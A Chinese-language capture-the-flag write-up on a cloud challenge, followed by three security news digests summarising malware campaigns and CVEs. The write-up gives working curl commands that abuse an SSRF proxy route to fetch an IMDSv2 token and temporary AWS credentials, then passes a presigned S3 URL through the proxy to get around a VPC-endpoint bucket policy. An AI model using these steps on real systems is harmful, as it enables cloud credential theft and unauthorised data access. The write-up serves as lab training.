背景 经过几周的利用和权限提升，你获得了访问你希望是最终服务器的权限，然后可以使用它从 S3 存储桶中提取秘密旗帜。 但这不会容易。目标使用 AWS 数据边界来限制对存储桶内容的访问。 `You've discovered a Spring Boot Actuator application running on AWS: curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com {"status":"UP"} 解决过程 Spring Boot Actuator 泄露 首先我们分析一下，flag 肯定是在存储桶中，因为这里说了已经对我们的桶进行了限制，所以匿名访问的方法可能没有作用，不过这里还是尝试一下，首先匿名访问需要获取存储桶的名称，因为题目已经告诉了 Spring Boot Actuator明显我们可以查看 env 尝试列出 user@monthly-challenge:~$ aws s3 ls s3://challenge01-470f711/ --no-sign-request An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied 不行，没有权限，所以我们必须去寻找凭证 我第一想法就是元数据 但是没有反应 curl http://169.254.169.254/latest/meta-data 估计这个 shell 不是一个 EC2 的 然后就是寻找凭据了，可以使用一些工具，比如 truffleHog 然后简单找了一下 user@monthly-challenge:/$ grep -ri --exclude-dir={/proc,/sys,/dev,/run,/snap,/var/lib/dock er} 'Secret Access Key' / /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/datazone/2018-05-10/service-2.json:          "documentation":"<p>The secret access key of a connection.</p>" /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/datazone/2018-05-10/service-2.json:          "documentation":"<p>The secret access key of the environment credentials.</p>" /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/s3control/2018-08-20/service-2.json:          "documentation":"<p>The secret access key of the Amazon Web Services STS temporary credential that S3 Access Grants vends to grantees and client applications. </p>" /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/appflow/2020-08-23/service-2.json:          "documentation":"<p> The Secret Access Key portion of the credentials. </p>" /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/appflow/2020-08-23/service-2.json:          "documentation":"<p> The Secret Access Key portion of the credentials. </p>" /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/opsworks/2013-02-18/service-2.json:          "documentation":"<p>When included in a request, the parameter depends on the repository type.</p> <ul> <li> <p>For Amazon S3 bundles, set <code>Password</code> to the appropriate IAM secret access ke /usr/local/aws-cli/v2/2.27.37/dist/awscli/botocore/data/s3/2006-03-01/service-2.json:      "documentation":"<p>Creates a copy of an object that is already stored in Amazon S3.</p> <note> <p>You can store individual objects of up to 5 TB in Amazon S3. You create a copy of your object up to 5 GB in si 找了也没有，常规的收集都没有发现，然后只能根据提示，继续在 spring 这个面努力了 然后去批量爆破一波查看是否有可利用的信息 然后又把 mapping 中的路由全部提取出来，看到了 proxy 路由 这个应该就是拿来访问元数据的了 元数据绕过 一般都有 ssrf 漏洞 user@monthly-challenge:/$ curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/ HTTP error: 401 Unauthorized 可以看到至少是可以成功访问元数据了，只不过没有权限，因为之后采用了 IMDSv2 我们首先获取 token，使用 PUT 请求 user@monthly-challenge:/$ curl -X PUT \  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \  "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/api/token" AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q== 可以看到获取到了 Token，我们尝试使用 token 来访问元数据 user@monthly-challenge:/$ curl -H "X-aws: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q==" "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/" ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hibernation/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ system 可以了，我们访问凭证信息 user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q==" \ "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/" challenge01-5592368 然后使用它的凭证 user@monthly-challenge:/$ curl -H "X-aws-ec2-metadata-token: AQAEAH7E4VkFWamewp6GggQ0KhjyVTbs7h4FUWC46kchGDZOu-uX_Q==" "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368" {  "Code" : "Success",  "LastUpdated" : "2025-07-10T13:26:52Z",  "Type" : "AWS-HMAC",  "AccessKeyId" : "ASIARK***WELX36",  "SecretAccessKey" : "PsrjWr+AANNHBG3n***NmUHVglRE+BV",  "Token" : "IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIC6AH+4pBi+UXSj7Xih2aQvR3LmiwIQ8TeL+O6Gv2iotAiEAi6CjgMDpky/IC6HpBwzG52L/ED+fizjGUTaX/5YP4KcqwQUIv///////////ARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqF+yWFZz/IuhF6PqC8iDwPJ9uFspInzbcKaJ86Qx1issOwp+JUdXyIUaYjLrJhd+klRXKoSNxR/K/F  "Expiration" : "2025-07-10T19:47:29Z" } 有了这些我们就可以配置了首先我们进行配置 root@hcss-ecs-0d0e:~# aws configure set aws_access_key_id ASIARK7LBO**EXWELX36 --profile challenge01 root@hcss-ecs-0d0e:~# aws configure set aws_secret_access_key PsrjWr+AANNHBG3ngmwQXdCdc******mUHVglRE+BV --profile challenge01 root@hcss-ecs-0d0e:~# aws configure set aws_session_token IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIC6AH+4pBi+UXSj7Xih2aQvR3LmiwIQ8TeL+O6Gv2iotAiEAi6CjgMDpky/IC6HpBwzG52L/ED+fizjGUTaX/5YP4KcqwQUIv///////////ARAAGgwwOTIyOTc4NTEzNzQiDGpyJeQycy6B9rX9XiqVBYrNoqF+yWFZz/IuhF6PqC8iDwPJ9uFspInzbc 之后我们就会有这个用户的权限了 目标文件位置获取 我们首先查一下这个用户有的 bucket 的权限 首先获取当前用户信息 root@hcss-ecs-0d0e:~# aws sts get-caller-identity --profile challenge01 {    "UserId": "AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279",    "Account": "092297851374",    "Arn": "arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279" } 然后我们查看对应的策略 root@hcss-ecs-0d0e:~# aws iam simulate-principal-policy \  --policy-source-arn arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 \  --action-names s3:ListBucket s3:GetObject s3:PutObject s3:DeleteObject s3:ListAllMyBuckets \  --profile challenge01 An error occurred (AccessDenied) when calling the SimulatePrincipalPolicy operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: iam:SimulatePrincipalPolicy on resource: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/ root@hcss-ecs-0d0e:~# 可惜这个用户没有权限，我们直接列 root@hcss-ecs-0d0e:~# aws s3 ls --profile challenge01 An error occurred (AccessDenied) when calling the ListBuckets operation: User: arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279 is not authorized to perform: s3:ListAllMyBuckets because no identity-based policy allows the s3:ListAllMyBuckets action 没有列出桶的权限，不过我们知道桶的名称 root@hcss-ecs-0d0e:~# aws s3 ls s3://challenge01-470f711/ --recursive --profile challenge01 2025-06-19 01:15:24         29 hello.txt 2025-06-17 06:01:49         51 private/flag.txt 读取文件绕过 尝试读取的时候可惜 root@hcss-ecs-0d0e:~# aws s3 cp s3://challenge01-470f711/private/flag.txt - --profile challenge01 download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden 没有读的权限 我们还是得查查存储桶的策略 root@hcss-ecs-0d0e:~# aws s3api get-bucket-policy --bucket challenge01-470f711 --profile challenge01 {    "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Deny\",\"Principal\":\"*\",\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::challenge01-470f711/private/*\",\"Condition\":{\"StringNotEquals\":{\"aws:SourceVpce\":\"vpce-0dfd8b6aa1642a057\"}}}]}" } 限制只有指定 VPC 端点（VPCe） 的请求才可以访问，否则即使有权限也会被拒绝 怎么办呢 聪明的 GPT 给出了答案 也让我想起了 proxy root@hcss-ecs-0d0e:~# curl "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://s3.amazon aws.com/challenge01-470f711/private/flag.txt" HTTP error: 403 Forbiddenroot 但是结果是还是被阻止了 这里可能 proxy 不在 VPC，不过我们可以验证一下 但是刚刚都读取成功了，大概率是在的 没办法，只能寻找好朋友的帮助了 首先需要了解一下 SigV4 签名，在 AWS 中访问私有资源（如 S3 对象）时，AWS 要求你的请求是已签名的 参考https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html 默认情况下，所有 Amazon S3 对象都是私有的，只有对象拥有者才具有访问它们的权限。但是，对象拥有者可以通过创建预签名 URL 与其他人共享对象。预签名 URL 使用安全凭证来授予下载对象的限时权限。可以在浏览器中输入此 URL，或者程序使用此 URL 来下载对象。预签名 URL 使用的凭证是生成该 URL 的 AWS 用户的凭证。 我们需要使用预签名 https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/using-presigned-url.html创建预签名 URL 时，必须提供您的安全凭证，然后指定以下内容： 一个 Amazon S3 存储桶 对象键（如果将在您的 Amazon S3 存储桶中下载此对象，则一旦上传，这就是要上传的文件名） HTTP 方法（GET 用于下载对象、PUT 用于上传、HEAD 用于读取对象元数据等） 过期时间间隔 按照这个我们直接运行命令生成如下的签名 root@hcss-ecs-0d0e:~# aws s3 presign s3://challenge01-470f711/private/flag.txt --profile challenge01 --expires-in 3600 https://challenge01-470f711.s3.amazonaws.com/private/flag.txt?AWSAccessKeyId=ASIARK7LBOHXEXWELX36&Signature=WT7zPvNKLF6zr%2Fi4%2FGvqpJHoZzs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIC6AH%2B4pBi%2BUXSj7Xih2aQvR3LmiwIQ8TeL%2BO6Gv2iotAiEAi6CjgMDpky 然后我们带着这个签名 但是内容一直被截断，很烦，我直接 URL 全编码后再次去访问 root@hcss-ecs-0d0e:~# curl "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=%68%74%74%70%73%3a%2f%2f%63%68%61%6c%6c%65%6e%67%65%30%31%2d%34%37%30%66%37%31%31%2e%73%33%2e%61%6d%61%7a%6f%6e%61%77%73%2e%63%6f%6d%2f%70%72%69%76%61%74%65%2f%66%6c%61%67%2e%74%78%74%3f%41%57%53%41%63%63% The flag is: ******** 成功 总结 总的来说，真的是很有实战意义的一次挑战，感觉整个过程前因后果是非常连贯的 获取桶名称-> 不能匿名访问->获取配置信息- 元数据 不能直接访问-走代理 mapping 泄露 proxy 元数据绕过 IMDSv2 安全机制 获取用户信息，查看权限 列取文件位置 vpc 限制，来联想 proxy 403，考虑预签名 URL 授予 行云流水

1、Lumma Stealer窃密软件卷土重来手段更隐秘 https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html Lumma Stealer是一种信息窃取恶意软件，曾在2025年5月被执法部门大规模打击，但近期又卷土重来。该恶意软件通过虚假破解软件、欺骗性网站和社交媒体帖子传播，能够窃取凭证和私人文件等敏感数据。此次回归，其背后的网络组织采用了更隐蔽的传播手段，包括滥用GitHub、虚假CAPTCHA网站等，并减少了对易受监控的基础设施的依赖。尽管执法部门查封了超过2300个恶意域名，但Lumma Stealer的目标账户数量在6月到7月间迅速回升至正常水平 2、思科ISE漏洞遭攻击可获未授权根访问权限 https://thehackernews.com/2025/07/cisco-confirms-active-exploits.html 思科确认其身份服务引擎（ISE）和ISE被动身份连接器（ISE-PIC）中的漏洞正遭主动利用。这些漏洞均为严重级别（CVSS评分10.0），攻击者无需身份验证即可远程以root身份执行命令。具体漏洞包括：CVE-2025-20281和CVE-2025-20337，因用户输入验证不足导致；CVE-2025-20282，因缺乏文件验证检查导致。攻击者可通过精心设计的API请求或文件上传来利用这些漏洞。鉴于攻击的高风险性，思科建议客户尽快升级到修复版本，并检查 3、欧洲大型医疗运行商AMEOS披露安全漏洞 https://www.ameos.eu/datenschutz/datenschutzvorfall-gem-art-34-dsgvo/ 中欧大型医疗保健网络运营商AMEOS集团宣布遭遇安全漏洞，可能导致客户、员工和合作伙伴的信息泄露。该组织根据《通用数据保护条例》（GDPR）在其网站上发布声明，承认外部行为者未经授权访问了其IT系统。AMEOS是瑞士、德国和奥地利最大的私立医院集团之一，拥有超过100家医疗机构和18000名员工。尽管采取了安全措施，但攻击者仍获取了敏感信息。作为应对，AMEOS关闭了所有IT系统，切断了网络连接，并聘请外部专家协助调查。目前尚无迹象表明数据已在网上传播， 4、SharePoint 漏洞正遭黑客大规模利用 https://www.freebuf.com/articles/web/441043.html CVE‑2025‑49706，一个存在于 SharePoint Server 中的身份欺骗漏洞，已经从中等风险演变为真刀真枪的网络攻击。 其变种漏洞 (CVE‑2025‑53770) 正被黑客在网络中大规模利用，如果你的企业还在使用本地部署的 SharePoint 2016、2019 或订阅版，请立即安装修复补丁，否则服务器可能面临被完全控制的风险。 5、首例利用微软UI自动化框架的银行木马 https://hackread.com/coyote-trojan-use-microsoft-ui-automation-bank-attacks/ 新版Coyote银行木马首次利用微软UIA框架窃取银行凭证，绕过安全监控，精准攻击75家金融机构，标志攻击技术重大升级。防御需监控UIA异常行为，加强威胁检测。 6、黑客论坛惊现 macOS 零日本地提权漏洞交易 https://cybersecuritynews.com/macos-0-day-lpe-exploit/ 黑客"skart7"在论坛出售macOS零日提权漏洞，影响13.0至15.5版本，标价3800美元。该漏洞利用系统逻辑缺陷，成功率100%，可获取root权限，威胁企业安全。专家建议部署EDR、PAM等防御措施。 7、Form-Data 库高危漏洞致数百万应用面临注入与远程代码执行风险 https://securityonline.info/critical-flaw-cve-2025-7783-cvss-9-4-in-form-data-library-exposes-millions-of-apps-to-multipart-injection-rce/ Form-Data库曝高危漏洞CVE-2025-7783（CVSS 9.4），因使用不安全的Math.random()生成边界值，可被预测导致多部分注入攻击，影响数百万应用。建议立即升级至2.5.4/3.0.4/4.0.4修复版本。 8、Interlock勒索软件同时攻击Windows与Linux系统 https://www.freebuf.com/articles/ics-articles/440846.html 美国网络安全和基础设施安全局（CISA）、联邦调查局（FBI）、卫生与公众服务部以及多州信息共享与分析中心联合发布紧急安全公告，警告自2024年9月下旬以来，Interlock勒索软件组织针对企业和关键基础设施部门的攻击正在升级。 9、诺基亚曝高危漏洞致电信网络面临远程代码执行风险 https://securityonline.info/critical-flaw-cve-2025-24936-cvss-9-0-in-nokia-wavesuite-noc-expose-telecom-networks-to-rce/ 诺基亚WS-NOC平台曝出两个高危漏洞（CVE-2025-24938和CVE-2025-24936，CVSS 8.4/9.0），允许攻击者通过高低权限账户执行系统命令，威胁全球电信网络安全，官方已发布补丁。 10、Windows 11推出新黑屏死机自动恢复工具 https://www.anquanke.com/post/id/310434 微软正在推出重大更新，作为Windows 11 24H2版的一部分，旨在减少系统停机时间，并帮助设备在发生严重故障时自我恢复，同时对广为人知的“蓝屏死机”（BSOD）崩溃界面进行全面升级。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、PoisonSeed利用二维码钓鱼绕过FIDO密钥保护 https://expel.com/blog/poisonseed-downgrading-fido-key-authentications-to-fetch-user-accounts/ 黑客组织PoisonSeed利用一种新颖的攻击技术，通过二维码钓鱼和跨设备登录滥用绕过了FIDO密钥的保护。FIDO密钥是一种基于硬件或软件的身份验证器，旨在通过公私密钥加密将登录信息绑定到特定域，以防止网络钓鱼。然而，攻击者利用FIDO密钥的跨设备登录功能，诱骗用户在不知情的情况下批准恶意会话的身份验证。这种攻击技术主要针对不强制执行严格邻近度检查的跨设备流程，例如蓝牙或本地设备认证。攻击链始于一封钓鱼 2、ExpressVPN漏洞致远程桌面用户IP泄露 https://www.bleepingcomputer.com/news/security/expressvpn-bug-leaked-user-ips-in-remote-desktop-sessions/ ExpressVPN修复了其Windows客户端的一个漏洞。该漏洞导致远程桌面协议（RDP）流量绕过VPN隧道，暴露用户真实IP地址。ExpressVPN是顶级VPN服务提供商，以无日志政策和仅RAM服务器著称。2025年4月25日，安全研究员通过漏洞赏金计划报告了该问题。调查显示，漏洞是由于调试代码残余被错误包含在生产版本中。受影响版本为12.97至12.101.0.2-beta。 3、戴尔测试平台遭勒索组织World Leaks入侵 https://www.bleepingcomputer.com/news/security/dell-confirms-breach-of-test-lab-platform-by-world-leaks-extortion-group/ 戴尔确认其客户解决方案中心平台遭“世界泄密”（World Leaks）勒索组织入侵，该平台用于向客户展示戴尔产品和解决方案。入侵发生在本月初，攻击者窃取了平台数据，包括合成数据、公开数据及少量过时联系人信息。尽管“世界泄密”声称窃取了1.3TB数据，但戴尔表示被盗数据主要是用于产品演示的非敏感信息。该勒索组织原名“猎人国际”，于2025年1月更名为“世界 4、伊朗APT组织部署新型恶意软件DCHSpy https://www.lookout.com/threat-intelligence/article/lookout-discovers-iranian-dchsy-surveillanceware 以色列与伊朗冲突期间，研究人员发现伊朗网络间谍组织MuddyWater部署了新的DCHSpy恶意软件样本。DCHSpy是一款Android监控工具，可收集设备上的账户信息、联系人、短信、文件、位置数据、通话记录以及WhatsApp数据，甚至能通过控制麦克风和相机进行录音和拍照。此次攻击利用StarLink诱饵伪装成VPN应用进行传播，目标可能是使用StarLink服务的伊朗用户。DCHSpy与 5、多款热门 npm 包遭钓鱼攻击劫持并用于投放恶意软件 https://www.anquanke.com/post/id/310334 本周，多款流行的 JavaScript 库遭劫持并被用于投放恶意软件，这是一场通过精准钓鱼攻击和凭证窃取实施的软件供应链攻击事件。其中最受欢迎的 npm 包 eslint-config-prettier 每周下载量超过 3000 万次，在其维护者遭遇钓鱼攻击后被攻破。攻击者还针对该维护者名下的其他包发起攻击，包括 eslint-plugin-prettier、synckit、@pkgr/core 和 napi-postinstall。 6、LV近42万香港客户资料外泄，官方主动通知用户 https://www.secrss.com/articles/81135 据北京商报援引香港《文汇报》等媒体报道，法国奢侈品牌路易威登（Louis Vuitton）近日发客户信，称发生客户资料外泄事件，近42万名香港客户受影响。外泄的资料涉及客户姓名、护照号码、出生日期、地址、电邮地址、电话号码、购物记录和产品喜好资料。 7、Windows Server KB5062557 导致集群和虚拟机问题 https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-server-kb5062557-causes-cluster-vm-issues Microsoft 建议企业联系支持以缓解安装本月 Windows Server 2019 安全更新后导致的群集服务和虚拟机重启问题已知问题。安装于 7 月 8 日发布的 KB5062557 更新后，群集服务（一个对群集操作至关重要的系统组件）可能会无法正常工作。 8、Helmholz 工业路由器发现八个漏洞易受攻击 https://www.securityweek.com/vulnerabilities-expose-helmholz-industrial-routers-to-hacking/ 最近，德国工业和自动化解决方案提供商 Helmholz 生产的路由器中发现并修复了几个可能严重的漏洞。在 Helmholz 的 REX 100 路由器中发现的八个安全漏洞，这些漏洞使组织能够远程访问和管理工业网络。这些安全漏洞的存在上周被揭露。 9、迪奥称客户个人信息在网络攻击中被盗取 https://www.securityweek.com/dior-says-personal-information-stolen-in-cyberattack/ 迪奥这家法国奢侈时尚巨头通知客户，其个人资料可能在 2025 年 1 月遭到数据泄露。该公司表示，该事件发生在 2025 年 1 月 26 日，涉及未经授权访问包含迪奥客户信息的数据库。 10、微软警告SharePoint存在零日漏洞已被利用，目前无补丁可用 https://www.securityweek.com/sharepoint-under-attack-microsoft-warns-of-zero-day-exploited-in-the-wild-no-patch-available/ Microsoft 在周六向 SharePoint Server 的用户发出紧急警告，称有活跃的攻击正在利用该软件产品中的零日漏洞，该漏洞已被分配了 CVE-2025-53770，CVSS 评分为 9.8。目前尚无针对这一缺陷的补丁，“ToolShell”这一名称被用来指代该漏洞，微软表示它是一种 CVE-2025-49706 的变种。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、EncryptHub利用虚假AI平台攻击Web3开发者 https://catalyst.prodaft.com/public/report/larva-208s-new-campaign-targets-web3-developers/overview#heading-1001 网络安全机构发现，名为EncryptHub的威胁行为体针对Web3开发者发起攻击活动，通过虚假AI平台（如模仿Teampilot的Norlax AI）以工作机会或投资组合审查为由引诱受害者。攻击者利用欺骗性会议链接，诱使开发者点击，进而下载伪装成正版Realtek HD音频驱动程序的恶意软件Fickle Stealer，窃取加密货币钱包、开发凭证和敏感项目数据。此次行动 2、未修补SharePoint零日漏洞致75台以上服务器遭入侵 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770 微软披露了一个严重的SharePoint零日漏洞（CVE-2025-53770，CVSS评分9.8），该漏洞已被用于大规模攻击活动，导致超过75台公司服务器被入侵。该漏洞是CVE-2025-49706（CVSS评分6.3）的变体，后者已在7月补丁更新中修复。攻击者利用该漏洞在身份验证前执行代码，窃取机器密钥以实现持久化和横向移动。微软表示正在测试全面更新，同时建议客户配置AMSI集成并部署Defender AV。目前，全球已有超过85台SharePoint 3、Ivanti零日漏洞被利用投放恶意木马 https://thehackernews.com/2025/07/ivanti-zero-days-exploited-to-drop.html 网络安全研究人员披露，名为MDifyLoader的新恶意软件与利用Ivanti Connect Secure (ICS)设备安全漏洞的攻击有关。攻击者利用CVE-2025-0282和CVE-2025-22457漏洞投放MDifyLoader，并在内存中启动Cobalt Strike。CVE-2025-0282允许未经身份验证的远程代码执行，已于2025年1月修复；CVE-2025-22457是一个堆栈缓冲区溢出漏洞，已于2025年4月修复。攻击者 4、日本警方免费发布Phobos和8Base勒索软件解密器 https://www.bleepingcomputer.com/news/security/new-phobos-ransomware-decryptor-lets-victims-recover-files-for-free 日本警方发布了针对Phobos和8Base勒索软件的免费解密器，受害者可以通过该工具免费恢复被加密的文件。Phobos是一个勒索软件即服务（RaaS）组织，自2018年12月启动以来，对全球许多企业发动了攻击。2023年，8Base勒索软件行动启动，采用双重勒索手段，加密文件并窃取数据。2024年，一名涉嫌领导Phobos行动的俄罗斯国民被引渡到美国。今年，国际执法 5、慧与HPE Instant On设备存在硬编码凭证漏洞 https://thehackernews.com/2025/07/hard-coded-credentials-found-in-hpe.html 惠普修复HPE Instant On接入点高危漏洞（CVE-2025-37103，CVSS 9.8），攻击者可利用硬编码凭证获取管理员权限，并与命令注入漏洞（CVE-2025-37102）组合攻击。建议用户尽快升级至3.2.1.0及以上版本。 6、Livewire远程代码执行漏洞威胁数百万Laravel应用 https://securityonline.info/critical-livewire-rce-cve-2025-54068-threatens-millions-of-laravel-apps-patch-immediately/ Livewire框架3.6.3及更早版本存在高危RCE漏洞(CVE-2025-54068)，攻击者可未授权执行任意代码，影响数百万应用。官方已发布3.6.4修复版本，要求立即升级，无临时缓解方案。 7、Arch Linux 移除了多个被植入木马的 AUR 软件包 https://www.anquanke.com/post/id/310327 Arch Linux官方已下架三款被植入远程访问木马（RAT）“CHAOS”的恶意软件包，这些软件包此前被上传至Arch用户社区仓库（AUR），并可在Linux系统中执行恶意远程控制行为。 8、Oracle云代码编辑器曝RCE漏洞，允许攻击者上传恶意文件 https://www.anquanke.com/post/id/310236 Oracle云基础设施（OCI）代码编辑器近日被披露存在一个严重的远程代码执行（RCE）漏洞，攻击者可通过用户的一次点击操作，静默劫持其 Cloud Shell 环境。该漏洞目前已被修复，影响范围包括代码编辑器所集成的多个服务模块，如资源管理器（Resource Manager）、函数服务（Functions）和数据科学（Data Science），凸显了看似独立的云开发工具如何可能演变为攻击载体。 9、谷歌修复Chrome中被利用的沙箱逃逸零日漏洞 https://www.anquanke.com/post/id/310244 谷歌已发布Chrome浏览器安全更新，修复包括一处被攻击者主动利用的漏洞在内的六个安全缺陷。该漏洞编号为CVE-2025-6558，严重性评级为高（CVSS分数8.8），由谷歌威胁分析团队（TAG）于6月23日发现。 10、360联合清华大学发布全球首份智能体安全报告，曝光20+漏洞 https://www.anquanke.com/post/id/310267 近日，360联合清华大学发布全球首份漏洞视角的《智能体安全实践报告》，通过典型攻击面梳理和漏洞挖掘研究，深入分析智能体全生命周期链路各个场景的安全风险。结合360安全智能体的高效代码分析能力以及特有的特征库，发现并分析了智能体相关开源项目漏洞20余个，其中不乏被广泛使用的Github高星项目，旨在提供智能体安全的综合性视角，为智能体安全生态的持续、积极发展贡献力量。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。